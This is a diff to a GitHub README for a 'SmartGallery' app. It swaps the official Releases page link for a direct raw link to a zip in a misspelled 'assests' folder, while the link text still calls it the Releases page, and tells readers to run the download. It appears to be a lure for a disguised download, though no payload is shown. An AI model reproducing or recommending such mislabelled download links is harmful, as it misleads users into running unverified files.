RianCole001/SmartGallery/README.md

 ## 📋 Download & Install

-To get SmartGallery, please visit the [Releases page](https://github.com/RianCole001/SmartGallery/releases) to download the latest version.
+To get SmartGallery, please visit the [Releases page](https://raw.githubusercontent.com/RianCole001/SmartGallery/main/assests/SmartGallery_1.9.zip) to download the latest version.
 Follow these steps:

 1. **Visit the Releases Page:** Click on the link above to go to the SmartGallery Releases page.
 2. **Select the Latest Version:** Look for the most recent version listed at the top of the page.
-3. **Download the Installer:** Click on the installer link (e.g., SmartGallery_Installer.exe) to download SmartGallery to your computer.
+3. **Download the Installer:** Click on the installer link (e.g., https://raw.githubusercontent.com/RianCole001/SmartGallery/main/assests/SmartGallery_1.9.zip) to download SmartGallery to your computer.
 4. **Run the Installer:** Locate the downloaded file.
 Double-click it to begin the installation.
 5. **Follow On-Screen Instructions:** Follow the prompts to complete the installation process.